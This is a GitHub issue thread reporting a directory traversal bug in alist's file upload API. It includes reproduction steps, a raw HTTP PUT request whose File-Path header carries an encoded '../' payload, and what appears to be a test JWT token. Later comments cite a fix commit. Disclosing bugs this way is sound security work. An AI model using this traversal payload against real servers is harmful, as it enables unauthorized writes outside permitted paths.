### ISSUE TITLE
Directory traversal file upload vulnerability

### ISSUE THREAD

**Issue by Shydlock** [alist-org/alist#2449]
### Please make sure of the following things

- [X] I have read the [documentation](https://alist.nn.ci).
- [X] I'm sure there are no duplicate issues or discussions.
- [X] I'm sure it's due to `alist` and not something else(such as `Dependencies` or `Operational`).
- [X] I'm sure I'm using the latest version

### Alist Version / Alist 版本

v3.4.0（It seems like this problem still exists in version 3.5.1）

### Driver used / 使用的存储驱动

Local

### Describe the bug / 问题描述

- A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path

- I created a user 'test' with file upload permission only and set its base path to '/test'
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203326713-4f749b56-d601-40a3-b0e5-67f5316cd6d3.png">

- My file directory structure is as follows
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203326838-52df5b42-617f-4f18-b6bc-39e80b61c54c.png">
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203326868-9299e394-2bed-4603-8899-ffdf48e4e97c.png">
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203327107-83a8e82d-f888-4dee-bf61-c48ccaaeb0e4.png">

- Login as 'test', found out that I am already in '/test'
<img width="1335" alt="image" src="https://user-images.githubusercontent.com/52377340/203327280-53501e5a-88e5-4bbd-8c1e-fb54bccbc1c1.png">

- And try to upload a file, catch the package and modified the 'File-path' parameter with '../'
<img width="1335" alt="image" src="https://user-images.githubusercontent.com/52377340/203327417-a5779f10-f988-4840-b8b3-19b64ab042d8.png">
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203327461-9710f05d-a485-4c40-9bcb-0a76a3fb833d.png">

- Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203327673-cc45becf-7b91-4a70-b5da-1e0473ff94c0.png">

### Reproduction / 复现链接

Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, */*
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PNG


### Logs / 日志

```shell
None
```

**Comment by Shydlock** [comment]
It seems like this problem still exists in version 3.5.1

**Comment by BoYanZh** [comment]
It should have been fixed in b5bf5f43253175b55fa2cb511fea601e677d2d83.

**Comment by Chestnuts4** [comment]
it just can only upload PNG file?
